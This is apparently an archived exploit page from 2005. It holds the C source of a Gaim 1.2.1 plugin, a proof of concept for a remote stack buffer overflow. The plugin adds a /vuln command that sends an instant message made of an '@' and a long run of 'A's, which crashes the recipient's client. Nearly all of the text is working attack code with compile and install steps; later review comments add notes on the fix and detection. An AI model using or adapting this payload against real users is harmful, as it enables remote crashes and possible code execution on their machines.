


2005-05-17 Gaim 1.2.x URL Handling Remote Buffer Overflow PoC Exploit
Rated as : Critical 

// Written by Ron <iago@valhallalegends.com>
// Friday, May 13, 2005
//
// This is a very weak demonstration of Gaim 1.2.1's stack overflow vulnerability
// when processing email addresses. What this basically does is segfault you when you
// do a /vuln command in a conversation, and, if you're using a protocol that allows
// a 10002-character message to go through, also segfaults the person you sent it to.
// The reason is that gaim's stack is overwritten with a whole bunch of 'A's, and
// the return address of the function ends up at 0x41414141. That's no good for
// anybody.
//
// This code should be considered public domain, and is freely modifiable/distributable
// by any and everyone.
//
// Note:
// To compile, place this in the "plugins" directory of Gaim's source
// (gaim-1.2.1/plugins) and type "make vuln-plugin.so". This will compile vuln-plugin.so.
// Then put it in ~/.gaim/plugins, restart gaim, and load it as a plugin.


#include <unistd.h>
#include <ctype.h>
#include <string.h>
#include <locale.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "internal.h"
#include "gtkgaim.h"

#include "debug.h"
#include "signals.h"
#include "util.h"
#include "version.h"
#include "cmds.h"
#include "conversation.h"

#include "gtkplugin.h"
#include "gtkutils.h"

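/* Short label for this plugin. Not referenced by the code shown in this listing. */
#define ME "1.2.1 Vuln Check"

/* Not referenced by the code shown in this listing. */
#define MAXLENGTH 1024

/*
 * Free-text description string. Not referenced by the code shown in this
 * listing.
 *
 * The published page hard-wrapped this literal across two source lines, which
 * leaves an unterminated string constant; it is rejoined here on one line with
 * the text unchanged.
 */
#define XMMS_PLUGIN_VERSION "I am a test plugin to check for URL encoding vulnerability."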

/*
 * Identifier of the registered "/vuln" command: assigned from
 * gaim_cmd_register() in plugin_load() and handed back to
 * gaim_cmd_unregister() in plugin_unload().
 */
static GaimCmdId cmd;


/*
 * Message text that go() passes to gaim_conv_im_send().
 *
 * NOTE(review): as printed on this page the literal is abbreviated.
 * "...(A*8192)..." looks like the author's shorthand for a long run of filler
 * rather than literal message content, so the string as written here is only
 * a few dozen characters long.
 *
 * Shape of the input: one character, '@', then filler -- an e-mail-address-like
 * token whose length is far beyond any valid address. The header comment of
 * this file attributes the crash to Gaim 1.2.1's processing of e-mail
 * addresses in message text.
 *
 * For defenders: the root cause described is an unbounded copy into a stack
 * buffer in the receiving client, so the fix belongs in the client (bounded
 * copies / length checks when scanning message text for addresses). This page
 * does not name a fixed release -- check the vendor advisory. An inbound
 * message containing an address-like token thousands of characters long is a
 * usable detection signal at a gateway or in logs.
 */
char *code = "A@AAAA...(A*8192)...AAAAA";

/*
 * Callback registered for the "/vuln" conversation command.
 *
 * Sends the file-scope string `code` as an instant message on the
 * conversation in which the command was entered, then reports success
 * unconditionally.
 *
 * conv   conversation the command was typed in; its IM data is obtained with
 *        GAIM_CONV_IM().
 * cmd, args, error, data
 *        unused. Note that the `cmd` parameter shadows the file-scope
 *        `cmd` command id inside this function.
 *
 * NOTE(review): the function is declared to return gboolean but returns
 * GAIM_CMD_STATUS_OK and is installed through a (GaimCmdFunc) cast in
 * plugin_load() -- presumably GaimCmdFunc returns a command-status type;
 * confirm against cmds.h.
 */
gboolean go(GaimConversation *conv, const gchar *cmd, gchar **args,
            gchar **error, void *data)
{
    /* The message body is always the fixed global string; nothing from the
     * command line is used. */
    gaim_conv_im_send(GAIM_CONV_IM(conv), code);

    return GAIM_CMD_STATUS_OK;
}

/*
 * Plugin load hook: registers the "/vuln" command with go() as its handler
 * and stores the returned id in the file-scope `cmd` so plugin_unload() can
 * remove it again.
 *
 * Always returns TRUE. NOTE(review): the value returned by
 * gaim_cmd_register() is stored but not checked before reporting success.
 *
 * plugin  unused.
 */
static gboolean plugin_load(GaimPlugin *plugin)
{
    /* Argument roles below are inferred from the values passed -- confirm
     * against the gaim_cmd_register() prototype in cmds.h. */
    cmd = gaim_cmd_register(
        "vuln",             /* command name */
        "",                 /* empty string: presumably "takes no arguments" */
        GAIM_CMD_P_DEFAULT, /* priority */
        GAIM_CMD_FLAG_IM,   /* flag names IM conversations */
        NULL,
        (GaimCmdFunc)go,    /* handler, cast to the registry's callback type */
        "/vuln",            /* presumably the help/usage text */
        NULL);

    return TRUE;
}

/*
 * Plugin unload hook: removes the command whose id plugin_load() stored in
 * the file-scope `cmd`.
 *
 * Always returns TRUE.
 *
 * plugin  unused.
 */
static gboolean plugin_unload(GaimPlugin *plugin)
{
    gaim_cmd_unregister(cmd);

    return TRUE;
}

/*
 * Plugin descriptor passed to GAIM_INIT_PLUGIN() at the bottom of the file.
 *
 * The initializer is positional, so the order of the entries must match the
 * field order of GaimPluginInfo in the Gaim headers this is built against.
 * Only the load and unload hooks are set; the id, summary, description and
 * homepage entries are NULL or empty strings.
 */
static GaimPluginInfo info =
{
GAIM_PLUGIN_MAGIC,
GAIM_MAJOR_VERSION,
GAIM_MINOR_VERSION,
GAIM_PLUGIN_STANDARD, /**< type */
NULL, /**< ui_requirement */
0, /**< flags */
NULL, /**< dependencies */
GAIM_PRIORITY_DEFAULT, /**< priority */
NULL, /**< id (none given) */
N_("1.2.1 Email Overflow Demo"), /**< name */
VERSION, /**< version */
/** summary (left empty) */
N_(""),
/** description (left empty) */
N_(""),
"Ron <iago@valhallalegends.com>", /**< author */
"", /**< homepage (left empty) */

plugin_load, /**< load */
plugin_unload, /**< unload */
NULL, /**< destroy */

NULL, /**< ui_info */
NULL, /**< extra_info */
/* NOTE(review): the two trailing entries are unlabeled in the original;
 * which GaimPluginInfo fields they fill should be confirmed against
 * plugin.h for the targeted Gaim version. */
NULL,
NULL
};


/*
 * Plugin init hook handed to GAIM_INIT_PLUGIN(). Intentionally empty: this
 * plugin does no setup beyond what plugin_load() does.
 *
 * plugin  unused.
 */
static void init_plugin(GaimPlugin *plugin)
{
    /* nothing to initialise */
}

/*
 * Plugin entry-point declaration, tying together init_plugin() and the
 * `info` descriptor.
 * NOTE(review): the "XMMSPlugin" name (like the XMMS_PLUGIN_VERSION macro)
 * was presumably carried over from another plugin used as a template.
 */
GAIM_INIT_PLUGIN(XMMSPlugin, init_plugin, info)
securitydot.net - 2005-05-17
